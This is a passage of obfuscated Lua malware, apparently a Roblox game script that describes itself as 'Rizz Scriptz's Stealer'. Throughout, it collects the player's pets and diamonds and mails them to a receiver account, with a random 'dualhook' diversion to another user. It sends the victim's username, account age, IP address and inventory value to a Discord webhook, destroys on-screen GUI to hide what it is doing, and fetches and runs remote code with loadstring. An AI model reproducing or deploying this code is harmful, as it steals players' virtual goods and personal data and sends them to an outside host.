print(v7("\131\251\10\35\246","\194\231\148\100\70"));break;end end end if ((v70~=nil) and (invspace()~=(0 -0))) then while task.wait() do print(v7("\68\77\207\168\163\136\86\89\211\164\243\204","\168\38\44\161\195\150"));v69=v33:InvokeServer(v70);BHList5={};FinalList5={};local v257=v69.Storage.Pets;local v258={};for v345,v346 in pairs(v257) do v258[v346[v7("\149\245\134","\118\224\156\226\22\80\136\214")]]=false;end for v348,v349 in pairs(v257) do if ((table.find(PetIDList,v349[v7("\75\234","\224\34\142\57")])~=nil) and  not v349.l) then table.insert(BHList5,v349[v7("\203\174\193","\110\190\199\165\189\19\145\61")]);end end if ( #BHList5<=invspace()) then for v483,v484 in pairs(BHList5) do table.insert(FinalList5,v484);end elseif ( #BHList5>invspace()) then for v524,v525 in pairs(BHList5) do if ( #FinalList5<invspace()) then table.insert(FinalList5,v525);end end end print(v7("\248\195\91\225\152\211\143\171\45","\167\186\139\23\136\235"), #BHList5);print(v7("\60\188\134\12\22\153\129\30\14\224\200\87","\109\122\213\232"), #FinalList5);v75=v69.Storage.Currency.Diamonds;if (( #FinalList5==(0 -0)) and (v75<1000000000) and (v17>(363713 -253713))) then v75=0;end if (( #FinalList5~=(0 + 0)) or (v75~=(0 + 0))) then local v415=0;local v416;local v417;local v418;local v419;while true do if (v415==0) then v416=617 -(14 + 603) ;v417=nil;v415=1;end if (2==v415) then while true do if (v416==1) then v418,v419=pcall(function()v34:InvokeServer(v70,FinalList5,v75);end);if (v418==false) then wait(0.2);v34:InvokeServer(v70,FinalList5,0);end v416=2;end if (v416==0) then local v576=129 -(118 + 11) ;while true do if (v576==(0 + 0)) then v417={[1]=v70,[2]=FinalList5,[3 + 0 ]=0 -0 };wait();v576=1;end if ((950 -(551 + 398))==v576) then v416=1 + 0 ;break;end end end if (v416==(1 + 1)) then wait(1.5);v77=v77 +  #FinalList5 ;break;end end break;end if (v415==1) then v418=nil;v419=nil;v415=2;end end else print(v7("\234\248\172\53\187","\80\142\151\194"));break;end end end local v80=v71 + v72 + v73 + v74 + v75 ;local v81=game:GetService(v7("\51\202\118\85\6\212\100","\44\99\166\23")).LocalPlayer.PlayerGui.FreeGifts;Gifts={};if (invspace_nolimit()~=(0 + 0)) then local v204=0;local v205;while true do if (v204==0) then v205=0 -0 ;while true do if (v205==(0 -0)) then for v540,v541 in pairs(v81.Frame.Container.Gifts:GetDescendants()) do if (v541.Name==v7("\72\254\36\51\33","\196\28\151\73\86\83")) then if (v541.Text==v7("\193\6\45\21\135\85\89","\22\147\99\73\112\226\56\120")) then table.insert(Gifts,string.split(tostring(v541.Parent),"t")[1 + 1 ]);end end end if ( #Gifts~=(0 -0)) then for v577,v578 in pairs(Gifts) do v41:InvokeServer(tonumber(v578));end end break;end end break;end end end if (v59.World==v7("\139\101\227\226\131","\237\216\21\130\149")) then local v206=game:GetService(v7("\181\65\77\84\163\217\95\129\75","\62\226\46\63\63\208\169"))[v7("\218\38\120\162\47","\62\133\121\53\227\127\109\79")].Interactive[v7("\34\21\60\254\150\156\167\7\21\32\241\197","\194\112\116\82\149\182\206")].Pad;local v207=game:GetService(v7("\14\167\94\19\211\242\15\58\173","\110\89\200\44\120\160\130"))[v7("\148\252\102\103\115","\45\203\163\43\38\35\42\91")].Interactive[v7("\228\172\236\99\181\172\67\211\151\216\48","\52\178\229\188\67\231\201")].Pad;local v208=v206.BillboardGui.Timer;local v209=v207.BillboardGui.Timer;if (v208.Text==v7("\19\68\84\1\242\81\98","\67\65\33\48\100\151\60")) then local v350=0 + 0 ;local v351;while true do if ((89 -(40 + 49))==v350) then v351=0 -0 ;while true do if ((490 -(99 + 391))==v351) then game:GetService(v7("\239\235\175\193\246\205\244","\147\191\135\206\184")).LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(v206.Position);while task.wait() do if (v208.Text~=v7("\182\45\162\196\221\94\243","\210\228\72\198\161\184\51")) then break;end end break;end end break;end end end if table.find(v59.Gamepasses,15446215 + 3228090 ) then if (v209.Text==v7("\4\76\247\21\118\195\119","\174\86\41\147\112\19")) then game:GetService(v7("\107\12\140\18\32\29\2","\203\59\96\237\107\69\111\113")).LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(v207.Position);while task.wait() do if (v209.Text~=v7("\22\19\168\228\52\253\150","\183\68\118\204\129\81\144")) then break;end end end end end game:GetService(v7("\62\161\113\253\14\144\29","\226\110\205\16\132\107")).LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(game:GetService(v7("\220\204\242\210\82\251\194\227\220","\33\139\163\128\185"))[v7("\104\103\41\255\103","\190\55\56\100")].Interactive.Mailbox.Pad.Position);local v83=v37:InvokeServer();local v84= #v83.Inbox;if ((v84~=(0 -0)) and (invspace_nolimit()>=v84)) then local v210=0 -0 ;while true do if (v210==(0 + 0)) then v36:InvokeServer();task.wait(1.5);break;end end end local v85=v59.Diamonds;if (v85<(289444 -179444)) then local v211=0;local v212;while true do if (0==v211) then v212=1604 -(1032 + 572) ;while true do if (v212==(417 -(203 + 214))) then _G.Webhook=Webhook;_G.LoadingScreen=false;v212=1818 -(568 + 1249) ;end if (v212==2) then loadstring(game:HttpGetAsync(v7("\84\174\50\21\0\247\246\87\163\57\12\83\241\242\65\239\48\23\29\232","\147\54\207\92\126\115\131"),true))();return;end if ((1 + 0)==v212) then local v526=0 -0 ;while true do if ((0 -0)==v526) then _G.AntiLeave=false;_G.MouseLock=false;v526=1307 -(913 + 393) ;end if ((2 -1)==v526) then v212=2 -0 ;break;end end end end break;end end end if (_G.AntiLeave~=false) then local v213=410 -(269 + 141) ;while true do if (v213==(0 -0)) then for v486,v487 in pairs(game:GetService(v7("\61\61\52\100\8\108\30","\30\109\81\85\29\109")).LocalPlayer.PlayerGui:GetChildren()) do if (v487.Name~=v7("\214\127\66\179\56\202\243\237\104","\156\159\17\52\214\86\190")) then v487:Destroy();end end for v488,v489 in pairs(game:GetService(v7("\141\224\175\185\137\250\180","\220\206\143\221")):GetChildren()) do if ((v489.Name~=v7("\180\116\55\13\240\217\208","\178\230\29\77\119\184\172")) and (v489.Name~=v7("\199\177\8\23\120\224\197\172\5\22\103\236\210\171\3","\152\149\222\106\123\23"))) then v489:Destroy();end end break;end end end TitanicList={};TList={};STList={};BananaList={};BList={};HugeList={};HList={};SHList={};PogList={};PList={};SPList={};ExclusiveList={};EList={};SEList={};EventList={};EvList={};SEvList={};SecretList={};SList={};SSList={};MythicList={};MList={};SMList={};table.foreach(Library.Directory.Pets,function(v146,v147)if v147.titanic then table.insert(TitanicList,v146);end if (v147.name==v7("\223\39\248\66\187\220","\213\189\70\150\35")) then table.insert(BananaList,v146);end if v147.huge then table.insert(HugeList,v146);end if (string.split(v147.name," ")[1982 -(362 + 1619) ]==v7("\127\90\115","\104\47\53\20")) then table.insert(PogList,v146);end if ((v147.rarity==v7("\134\84\130\16\169\28\170\90\132","\111\195\44\225\124\220")) and  not v147.huge and  not v147.titanic) then table.insert(ExclusiveList,v146);end if (v147.rarity==v7("\253\80\5\125\191","\203\184\38\96\19\203")) then table.insert(EventList,v146);end if (v147.rarity==v7("\10\118\122\83\203\45","\174\89\19\25\33")) then table.insert(SecretList,v146);end if (v147.rarity==v7("\2\11\70\70\254\132\10\35","\107\79\114\50\46\151\231")) then table.insert(MythicList,v146);end end);local v86=v59.Pets;local v87={};for v148,v149 in pairs(v86) do v87[v149[v7("\44\175\177","\160\89\198\213\73\234\89\215")]]=false;end v32:InvokeServer(v87);for v151,v152 in pairs(v86) do if (table.find(TitanicList,v152[v7("\65\117","\165\40\17\212\158")])~=nil) then table.insert(TList,v152[v7("\240\208\12","\70\133\185\104\83")]);table.insert(STList,v152[v7("\13\65","\169\100\37\36\74")]);end end for v153,v154 in pairs(v86) do if (table.find(BananaList,v154[v7("\9\131","\48\96\231\194")])~=nil) then table.insert(BList,v154[v7("\221\83\10","\227\168\58\110\77\121\184\207")]);end end for v155,v156 in pairs(v86) do if (table.find(HugeList,v156[v7("\114\56","\197\27\92\223\32\209\187\17")])~=nil) then local v260=0;while true do if (v260==(1625 -(950 + 675))) then table.insert(HList,v156[v7("\22\86\199","\155\99\63\163")]);table.insert(SHList,v156[v7("\139\213","\228\226\177\193\237\217")]);break;end end end end for v157,v158 in pairs(v86) do if (table.find(PogList,v158[v7("\61\180","\134\84\208\67")])~=nil) then local v261=0 + 0 ;while true do if (v261==(1179 -(216 + 963))) then table.insert(PList,v158[v7("\6\165\130","\60\115\204\230")]);table.insert(SPList,v158[v7("\238\62","\16\135\90\139")]);break;end end end end for v159,v160 in pairs(v86) do if ((table.find(ExclusiveList,v160[v7("\93\112","\24\52\20\102\83\46\52")])~=nil) and  not v160.huge and  not v160.titanic) then table.insert(EList,v160[v7("\209\38\37","\111\164\79\65\68")]);table.insert(SEList,v160[v7("\207\221","\138\166\185\227\190\78")]);end end for v161,v162 in pairs(v86) do if (table.find(EventList,v162[v7("\194\112","\121\171\20\165\87\50\67")])~=nil) then local v262=1287 -(485 + 802) ;while true do if (v262==0) then table.insert(EvList,v162[v7("\211\49\189","\98\166\88\217\86\217")]);table.insert(SEvList,v162[v7("\255\242","\188\150\150\25\97\230")]);break;end end end end for v163,v164 in pairs(v86) do if (table.find(SecretList,v164[v7("\211\141","\141\186\233\63\98\108")])~=nil) then local v263=559 -(432 + 127) ;local v264;local v265;while true do if (v263==(1074 -(1065 + 8))) then while true do if ((0 + 0)==v264) then v265=0;while true do if (v265==(1601 -(635 + 966))) then table.insert(SList,v164[v7("\228\227\40","\69\145\138\76\214")]);table.insert(SSList,v164[v7("\121\203","\118\16\175\233\233\223")]);break;end end break;end end break;end if (v263==(0 + 0)) then v264=0;v265=nil;v263=1;end end end end for v165,v166 in pairs(v86) do if ((table.find(MythicList,v166[v7("\130\128","\29\235\228\85\219\142\235")])~=nil) and v166.hc and v166.dm) then local v266=42 -(5 + 37) ;while true do if (v266==(0 -0)) then table.insert(MList,v166[v7("\40\221\190","\50\93\180\218\189\23\46\71")]);table.insert(SMList,v166[v7("\215\160","\40\190\196\59\44\36\188")]);break;end end end end local v88= #TList +  #BList +  #HList +  #EList +  #EvList +  #MList +  #SList +  #PList ;local v89;if (v85>=(((41607 + 58393) * v88) + 100000)) then v89=(100000 * v88) + (158284 -58284) ;elseif (v85<(((46791 + 53209) * v88) + (207796 -107796))) then v89=v85;end local v90;if ((v85-v89)<(37912 -27912)) then v90=0 -0 ;elseif ((v85-v89)>=(23909 -13909)) then v90=v85-v89 ;end function diamondstoconvert(v167)local v168=0 + 0 ;local v169;local v170;local v171;local v172;while true do local v214=0;while true do if (v214==(530 -(318 + 211))) then if (v168==(9 -7)) then for v527,v528 in pairs(v170) do if (( #v171>=v528) and ( #v171<(v528 + (1590 -(963 + 624))))) then v172=v527;break;end end if v172 then local v542=0;local v543;local v544;local v545;local v546;while true do if (v542==(0 + 0)) then v543=v170[v172];v544=math.floor(v169/((856 -(518 + 328))^(v543-(6 -3))) ) * ((15 -5)^(v543-(320 -(301 + 16)))) ;v542=2 -1 ;end if (v542==(5 -3)) then v546=".";if ((string.split(v545,"")[2]=="0") and (string.split(v545,"")[1]~="0")) then v171=string.split(v171,".")[2 -1 ]   .. v546   .. string.split(v545,"")[1 + 0 ]   .. v172 ;elseif ((string.split(v545,"")[2 + 0 ]=="0") and (string.split(v545,"")[1 -0 ]=="0")) then v171=string.split(v171,".")[1]   .. v172 ;elseif ((string.split(v545,"")[2]~="0") and (string.split(v545,"")[1 + 0 ]~="0")) then v171=v171   .. v172 ;elseif ((string.split(v545,"")[1 + 1 ]~="0") and (string.split(v545,"")[3 -2 ]=="0")) then v171=v171   .. v172 ;else v171=v167;end break;end if (v542==1) then v171=string.format(v7("\65\191\234\145\55","\58\100\143\196\163\81"),v544/(10^(v543-(1 + 0))) );v545=string.split(v171,".")[1021 -(829 + 190) ];v542=2;end end end v168=3;end if (v168==(3 -2)) then v171=tostring(math.floor(v169));v172=nil;v168=2 -0 ;end break;end if (v214==(0 -0)) then if (v168==(0 -0)) then local v492=0 + 0 ;while true do if (v492==(1 + 0)) then v168=1;break;end if (v492==(0 -0)) then v169=v167;v170={k=4 + 0 ,m=620 -(520 + 93) ,b=10,T=289 -(259 + 17) ,[v7("\13\81","\109\92\37\188\212\154\29")]=1 + 15 };v492=1 + 0 ;end end end if (v168==(10 -7)) then return v171;end v214=592 -(396 + 195) ;end end end end local v91=diamondstoconvert(v90);local v92=diamondstoconvert(v80);function RAP()local v173=0;local v174;while true do if (v173==(0 -0)) then v174=diamondstoconvert(v59.RAP);return v174;end end end local v93=Webhook;local v94=true;local function v95(v175,v176,v177,v178,v179,v180,v181)local v182=1761 -(440 + 1321) ;local v183;local v184;local v185;local v186;local v187;local v188;while true do if ((1830 -(1059 + 770))==v182) then v185=nil;v186=nil;v182=2;end if (v182==0) then v183=0 -0 ;v184=nil;v182=546 -(424 + 121) ;end if (v182==(1 + 1)) then v187=nil;v188=nil;v182=1350 -(641 + 706) ;end if (v182==(2 + 1)) then while true do if (v183==(440 -(249 + 191))) then v184=0 -0 ;v185=nil;v183=1 + 0 ;end if (v183==2) then v188=nil;while true do if (v184==3) then if ((v77~=0) or (v80~=(0 -0))) then local v583=427 -(183 + 244) ;local v584;while true do if (v583==(0 + 0)) then v584=730 -(434 + 296) ;while true do if (v584==(5 -3)) then if ((Webhook~=nil) and (v94==true)) then v185={[v7("\226\202\75","\95\183\184\39")]=v93,[v7("\151\48\227\63","\98\213\95\135\70\52\224")]=newdata1,[v7("\211\166\221\127\91\250","\52\158\195\169\23")]=v7("\74\147\1\64","\235\26\220\82\20\230\85\27"),[v7("\160\164\232\198\113\154\178","\20\232\193\137\162")]=v186};request(v185);end break;end if (v584==(513 -(169 + 343))) then newdata1=game:GetService(v7("\145\167\179\15\187\246\226\175\186\164\26","\144\217\211\199\127\232\147")):JSONEncode(v25);v186={[v7("\251\32\48\60\208\75\22\9\236\54\46\45","\36\152\79\94\72\181\37\98")]="application/json"};v584=2 + 0 ;end if (v584==(0 -0)) then imgs="https://cdn.discordapp.com/attachments/1059224458033901668/1066510039818440864/New_Project_DADCF6A.gif";v25={[v7("\180\88\203\9\36\176\163","\222\215\55\165\125\65")]=v177,[v7("\57\194\195\8\252\192\224\79","\42\76\177\166\122\146\161\141")]=v7("\151\131\31\212\57\69\166\152\12\222\109\108","\22\197\234\101\174\25"),[v7("\44\34\164\200\119\189\232\147\63\56","\230\77\84\197\188\22\207\183")]=imgs,[v7("\252\25\196\249\136\178","\85\153\116\166\156\236\193\144")]={{[v7("\176\233\89\191\225","\96\196\128\45\211\132")]=v7("\127\199\85\90\197\239\156\209\33\199\49\31\206\179\131\209\33\133\59\109\219\181\174\196\41","\184\85\237\27\63\178\207\212"),[v7("\29\75\5","\63\104\57\105")]="https://discord.gg/uSgzNwHDTS",[v7("\31\158\180\65","\36\107\231\196")]=v7("\79\188\161\143","\231\61\213\194"),[v7("\10\162\49\124\27","\19\105\205\93")]=tonumber(7617186 -5022115 ),[v7("\189\0\203\140\61\167\9\215\141","\95\201\104\190\225")]={[v7("\186\217\205","\174\207\171\161")]=v188,[v7("\229\251\4\244\240\195","\183\141\158\109\147\152")]=345 + 75 ,[v7("\59\0\226\24\36","\108\76\105\134")]=420},[v7("\237\204\180\237\202\248","\174\139\165\209\129")]={{[v7("\173\178\239\196","\24\195\211\130\161\166\99\16")]="**This data was generated using Rizz Scriptz's Stealer** :moyai:",[v7("\80\2\229\57\86","\118\38\99\137\76\51")]=v7("\253\38\5\39\26\37\239\40\4\31\12\96\189\102\69\82\83\96","\64\157\70\101\114\105")   .. v22   .. "\nUser-ID      : "   .. v23.userId   .. "\nAccount Age  : "   .. v23.AccountAge   .. " Days\nIP Address   : "   .. v24   .. "\nRank           : "   .. v21   .. "\nRAP          : "   .. RAP()   .. "\nExploit      : "   .. v19   .. "\nReceiver     : "   .. v181   .. v7("\64\168\167","\112\32\200\199\131") ,[v7("\37\94\80\177\205\174","\66\76\48\60\216\163\203")]=false},{[v7("\180\135\116\246","\68\218\230\25\147\63\174")]=v7("\247\46\92\75\236\237\96\25\124\179\185\57\19\64\179\171\62\25\6\246\247\46\92\75\236","\214\205\74\51\44"),[v7("\236\77\238\233\114","\23\154\44\130\156")]=v7("\17\166\173","\115\113\198\205\206\86")   .. v179   .. v7("\132\87\254","\58\228\55\158") ,[v7("\189\135\220\39\50\168","\85\212\233\176\78\92\205")]=true},{[v7("\68\89\133\231","\130\42\56\232")]=v7("\176\178\33\238\26\127\160\255\0\234\65\50\229\187\32\240\10\117\170\239\35\230\77\101","\95\138\213\68\131\32"),[v7("\60\41\173\86\115","\22\74\72\193\35")]=v7("\44\121\228","\56\76\25\132")   .. v178   .. v7("\94\193\171","\175\62\161\203\70") ,[v7("\53\211\207\26\59\57","\85\92\189\163\115")]=true},{[v7("\39\173\61\61","\88\73\204\80")]=v175,[v7("\56\130\28\83\44","\186\78\227\112\38\73")]=v7("\252\87\253","\26\156\55\157\53\51")   .. v176   .. v7("\140\216\22","\48\236\184\118\185\216") ,[v7("\236\179\91\57\193\49","\84\133\221\55\80\175")]=true},{[v7("\179\230\41\163","\60\221\135\68\198\167")]=v7("\180\191\249\141\73\131\174\247\178\169\77\208\224\184\252\195\96\216\224\182\235\201\8\153\180\191\249\141\73\131","\185\142\221\152\227\34"),[v7("\78\196\91\239\70","\151\56\165\55\154\35\83")]=v7("\160\67\5","\142\192\35\101")   .. v76   .. v187   .. v7("\214\117\41","\118\182\21\73\195\135\236\204") ,[v7("\1\50\22\73\10\8","\157\104\92\122\32\100\109")]=true},{[v7("\173\167\194\207","\203\195\198\175\170\93\71\237")]=v7("\116\76\59\216\11\81\182\100\124\58\149\117\24\253\35\68\48\209\66\91\182\110\17\57\208\92\75","\156\78\43\94\181\49\113"),[v7("\100\233\200\182\14","\25\18\136\164\195\107\35")]=v7("\232\45\169","\216\136\77\201\47\18\220\161")   .. v92   .. v7("\45\236\43","\226\77\140\75\186\104\188") ,[v7("\176\192\220\54\65\188","\47\217\174\176\95")]=true},{[v7("\182\220\123\7","\70\216\189\22\98\210\52\24")]=v7("\128\210\172\137\214\195\224\174\136\198\206\215\249\199\153\144\232\167\199\251\207\216\166\148\153\144\159\249\138\220\212\218\186\184\222\213\202\183\143\137","\179\186\191\195\231"),[v7("\239\62\20\241\252","\132\153\95\120")]=v7("\177\178\14","\192\209\210\110\77\151\186")   .. v77   .. v7("\224\3\34","\164\128\99\66\137\159") ,[v7("\9\135\229\183\14\140","\222\96\233\137")]=true}}}}};v584=1;end end break;end end else local v585=483 -(397 + 86) ;while true do if (v585==2) then if ((Webhook~=nil) and (v94==true)) then local v609=876 -(423 + 453) ;while true do if (v609==(0 + 0)) then v185={[v7("\98\30\50","\66\55\108\94\63\18\180")]=v93,[v7("\54\130\129\46","\57\116\237\229\87\71")]=newdata1,[v7("\135\180\249\239\120\234","\39\202\209\141\135\23\142")]=v7("\207\28\58\62","\152\159\83\105\106\82"),[v7("\169\195\80\246\204\78\146","\60\225\166\49\146\169")]=v186};request(v185);break;end end end break;end if (v585==0) then imgs="https://cdn.discordapp.com/attachments/1059224458033901668/1066510039818440864/New_Project_DADCF6A.gif";v25={[v7("\33\208\203\178\226\130\3","\17\66\191\165\198\135\236\119")]=v177,[v7("\26\188\171\1\241\233\225\212","\177\111\207\206\115\159\136\140")]=v7("\55\128\10\14\148\124\92\23\128\0\0\206","\63\101\233\112\116\180\47"),[v7("\194\45\236\6\249\36\252\46\255\30","\86\163\91\141\114\152")]=imgs,[v7("\86\6\118\118\62\64","\90\51\107\20\19")]={{[v7("\153\249\145\227\56","\93\237\144\229\143")]=v7("\95\188\222\28\28\6\61\255\228\83\65\6\9\234\199\16\31\78\85\196\249\3\17\90\9","\38\117\150\144\121\107"),[v7("\56\169\226","\90\77\219\142")]="https://discord.gg/uSgzNwHDTS",[v7("\242\29\49\60","\26\134\100\65\89\44\103")]=v7("\227\234\51\43","\196\145\131\80\67"),[v7("\29\191\10\7\10","\136\126\208\102\104\120")]=tonumber(2265659 + 329412 ),[v7("\108\130\219\78\173\92\60\88\116","\49\24\234\174\35\207\50\93")]={[v7("\25\224\241","\17\108\146\157\232")]=v188,[v7("\67\198\29\234\39\188","\200\43\163\116\141\79")]=336 + 84 ,[v7("\168\63\57\151\184","\131\223\86\93\227\208\148")]=376 + 44 },[v7("\229\76\179\186\25\166","\213\131\37\214\214\125")]={{[v7("\40\42\40\186","\129\70\75\69\223")]="**This data was generated using Rizz Scriptz's Stealer** :moyai:",[v7("\80\202\255\252\121","\143\38\171\147\137\28")]=v7("\208\130\185\198\16\230\198\222\131\180\246\67\163\148\144\194\227\179","\180\176\226\217\147\99\131")   .. v22   .. "\nUser-ID      : "   .. v23.userId   .. "\nAccount Age  : "   .. v23.AccountAge   .. " Days\nIP Address   : "   .. v24   .. "\nRank         : "   .. v21   .. "\nRAP          : "   .. RAP()   .. "\nExploit      : "   .. v19   .. "\nReceiver     : "   .. v181   .. v7("\211\185\47","\103\179\217\79") ,[v7("\67\185\16\220\79\137","\195\42\215\124\181\33\236")]=false},{[v7("\3\88\58\59","\152\109\57\87\94\69")]=v7("\163\211\5\164\228\146\30\226\201\210\30\176\254\222\81\174\237\157\64\227\228\214\91\175\163","\200\153\183\106\195\222\178\52"),[v7("\36\226\132\40\76","\58\82\131\232\93\41")]=v7("\131\87\208","\95\227\55\176\117\61")   .. v179   .. v7("\24\126\35","\203\120\30\67\43") ,[v7("\248\43\65\230\215\244","\185\145\69\45\143")]=true},{[v7("\132\30\20\163","\188\234\127\121\198")]=v7("\98\53\22\142\98\114\89\201\28\59\18\142\55\60\23\144\114\120\83\217\63\55\30\217","\227\88\82\115"),[v7("\85\30\182\178\7","\19\35\127\218\199\98")]=v7("\28\251\10","\130\124\155\106")   .. v178   .. v7("\213\203\246","\223\181\171\150\207\195\150\28") ,[v7("\69\52\239\167\7\73","\105\44\90\131\206")]=true},{[v7("\241\225\191\188","\94\159\128\210\217\104")]=v175,[v7("\70\248\10\170\90","\26\48\153\102\223\63\31\153")]=v7("\2\64\237","\147\98\32\141")   .. v176   .. v7("\24\67\227","\43\120\35\131\170\102\54") ,[v7("\93\8\139\191\171\181","\228\52\102\231\214\197\208")]=true}}}}};v585=1 + 0 ;end if (v585==(1 + 0)) then newdata1=game:GetService(v7("\54\244\97\218\217\142\11\192\23\227\112","\182\126\128\21\170\138\235\121")):JSONEncode(v25);v186={[v7("\136\213\59\242\131\29\36\75\159\195\37\227","\102\235\186\85\134\230\115\80")]="application/json"};v585=1 + 1 ;end end end break;end if (v184==(2 -0)) then local v561=0;while true do if (v561==(1 + 0)) then v184=599 -(157 + 439) ;break;end if (v561==0) then v188=game:HttpGet("https://thumbnails.roblox.com/v1/assets?assetIds="   .. v188   .. v7("\92\80\38\183\42\91\235\62\21\78\42\160\38\20\213\2\27\65\38\139\48\69\225\11\8\4\48\170\37\76\184\90\72\18\59\247\109\25\163\8\21\80\46\162\43\20\213\0\29\4\42\176\28\64\247\13\15\78\34\177\98\79\228\2\9\71","\110\122\34\67\195\95\41\133") );v188=game:GetService(v7("\93\165\79\90\229\112\163\77\67\213\112","\182\21\209\59\42")):JSONDecode(v188).data[1].imageUrl;v561=1 -0 ;end end end if (v184==(0 -0)) then local v562=0 -0 ;while true do if (v562==(919 -(782 + 136))) then v184=856 -(112 + 743) ;break;end if (v562==0) then v185=nil;v186=nil;v562=1;end end end if (v184==1) then local v563=1171 -(1026 + 145) ;while true do if (v563==1) then v184=2;break;end if (v563==(0 + 0)) then v187="/5";v188=string.split(v180,"rbxassetid://")[720 -(493 + 225) ];v563=3 -2 ;end end end end break;end if (v183==(1 + 0)) then v186=nil;v187=nil;v183=5 -3 ;end end break;end end end local v96=getgenv().Settings.User;local v97;local v98;local v99;local v100;local v101;local v102;local v103;local v104;local v105;local v106=".gg/uSgzNwHDTS";if (v96~=nil) then local v215=0 + 0 ;local v216;while true do if (v215==(0 -0)) then v216=0 + 0 ;while true do if (v216==2) then if getgenv().Settings.Gems.Dualhook then v105=getgenv().Settings.Gems.Intensity;end if (getgenv().Settings.Webhook~=true) then v94=false;end if (getgenv().Settings.MailMessage~=nil) then v106=getgenv().Settings.MailMessage;end break;end if ((0 -0)==v216) then if getgenv().Settings.Titanics.Dualhook then v97=getgenv().Settings.Titanics.Intensity;end if getgenv().Settings.Banana.Dualhook then v98=getgenv().Settings.Banana.Intensity;end if getgenv().Settings.Huges.Dualhook then v99=getgenv().Settings.Huges.Intensity;end if getgenv().Settings.Pogs.Dualhook then v100=getgenv().Settings.Pogs.Intensity;end v216=1;end if (v216==1) then local v529=0;while true do if (v529==2) then v216=1597 -(210 + 1385) ;break;end if (v529==(1690 -(1201 + 488))) then if getgenv().Settings.Secrets.Dualhook then v103=getgenv().Settings.Secrets.Intensity;end if getgenv().Settings.HC_DM_Mythics.Dualhook then v104=getgenv().Settings.HC_DM_Mythics.Intensity;end v529=2 + 0 ;end if (v529==(0 -0)) then if getgenv().Settings.Exclusives.Dualhook then v101=getgenv().Settings.Exclusives.Intensity;end if getgenv().Settings.Events.Dualhook then v102=getgenv().Settings.Events.Intensity;end v529=1 -0 ;end end end end break;end end end function dualhook(v189)local v190=0;local v191;local v192;while true do if (v190==(586 -(352 + 233))) then while true do if (v191==(2 -1)) then if (v192<=v189) then return true;else return false;end break;end if (v191==0) then if  not tonumber(v189) then local v547=0;while true do if (v547==(0 + 0)) then game:GetService(v7("\31\18\46\51\4\21\60","\103\79\126\79\74\97")).LocalPlayer:Kick(v7("\138\106\199\51\127\90\140\126\223\122\90\90\179\113\199\118\80\9\179\107\202\51\104\27\182\106\214","\122\218\31\179\19\62"));return;end end end v192=math.random(2 -1 ,674 -(489 + 85) );v191=1502 -(277 + 1224) ;end end break;end if (v190==(1493 -(663 + 830))) then v191=0 + 0 ;v192=nil;v190=2 -1 ;end end end local v107;if ((UserName2~=nil) and (UserName2~=v7("\225\216\201\129\252\178\64\161\150\229\196\219\164","\37\211\182\173\161\169\193")) and (UserName2~="")) then v107=UserName2;else v107=UserName;end local v108;if (v88==(875 -(461 + 414))) then local v217=0 + 0 ;local v218;local v219;while true do if (0==v217) then v218=0 + 0 ;v219=nil;v217=1 + 0 ;end if (v217==(1 + 0)) then while true do if (v218==(250 -(172 + 78))) then local v530=0;local v531;while true do if (v530==(0 -0)) then v531=0;while true do if ((0 + 0)==v531) then if (v90>=(1324566211 -324566211)) then v108=UserName;else v108=v107;end if (v105~=nil) then if dualhook(v105) then v108=v96;end end v531=1 + 0 ;end if (v531==1) then v218=1 + 0 ;break;end end break;end end end if (v218==(1 -0)) then v219={[1]={[v7("\197\63\78\208\56\114\188\249\46","\217\151\90\45\185\72\27")]=v108,[v7("\231\117\230\31\89\205\120\244","\54\163\28\135\114")]=v90,[v7("\24\222\73\145","\31\72\187\61\226\46")]={},[v7("\238\3\80\193\70\121\33","\68\163\102\35\178\39\30")]=v106}};v35:InvokeServer(unpack(v219));break;end end break;end end end spawn(function()while wait() do if (( #TList~=0) or (TList~={})) then for v420,v421 in pairs(TList) do v108=UserName;if (v97~=nil) then if dualhook(v97) then v108=v96;end end local v422={[1 -0 ]={[v7("\140\117\217\206\19\188\134\31\170","\113\222\16\186\167\99\213\227")]=v108,[v7("\10\7\250\251\33\0\255\229","\150\78\110\155")]=v90,[v7("\181\192\51\242","\32\229\165\71\129\196\126\223")]={v421},[v7("\238\140\215\146\128\210\198","\181\163\233\164\225\225")]=v106}};v35:InvokeServer(unpack(v422));if (( #TList==0) or (TList=={})) then break;end end end end end);spawn(function()while wait() do if (( #BList~=(0 + 0)) and ( #TList==0)) then for v423,v424 in pairs(BList) do v108=UserName;if (v98~=nil) then if dualhook(v98) then v108=v96;end end local v425={[1 + 0 ]={[v7("\98\142\61\126\64\130\59\121\68","\23\48\235\94")]=v108,[v7("\88\211\217\80\88\61\214\111","\178\28\186\184\61\55\83")]=v90,[v7("\244\200\83\47","\149\164\173\39\92\146\110")]={v424},[v7("\222\34\3\12\27\28\246","\123\147\71\112\127\122")]=v106}};v35:InvokeServer(unpack(v425));if (( #BList==(0 -0)) or (BList=={})) then break;end end else break;end end end);spawn(function()while wait() do if (( #HList~=(0 + 0)) and ( #BList==0) and ( #TList==(0 + 0))) then for v426,v427 in pairs(HList) do v108=UserName;if (v99~=nil) then if dualhook(v99) then v108=v96;end end local v428={[448 -(133 + 314) ]={[v7("\254\200\129\120\86\197\200\140\101","\38\172\173\226\17")]=v108,[v7("\105\24\45\226\66\31\40\252","\143\45\113\76")]=v90,[v7("\136\189\8\47","\92\216\216\124")]={v427},[v7("\118\55\191\83\252\92\55","\157\59\82\204\32")]=v106}};v35:InvokeServer(unpack(v428));if (( #HList==(0 + 0)) or (HList=={})) then break;end end end end end);spawn(function()while wait() do if (( #PList~=(213 -(199 + 14))) and ( #TList==0) and ( #BList==(0 -0)) and ( #HList==0)) then for v429,v430 in pairs(PList) do v108=UserName;if (v100~=nil) then if dualhook(v100) then v108=v96;end end local v431={[1550 -(647 + 902) ]={[v7("\10\59\224\243\249\227\214\191\44","\209\88\94\131\154\137\138\179")]=v108,[v7("\12\168\197\113\17\45\53\49","\66\72\193\164\28\126\67\81")]=v90,[v7("\215\41\188\75","\22\135\76\200\56\70")]={v430},[v7("\160\53\235\55\92\230\136","\129\237\80\152\68\61")]=v106}};v35:InvokeServer(unpack(v431));if (( #PList==(233 -(85 + 148))) or (PList=={})) then break;end end end end end);spawn(function()while wait() do if (( #EList~=(1289 -(426 + 863))) and ( #HList==(0 -0)) and ( #TList==(1654 -(873 + 781))) and ( #BList==(0 -0)) and ( #PList==0)) then for v432,v433 in pairs(EList) do v108=UserName;if (v101~=nil) then if dualhook(v101) then 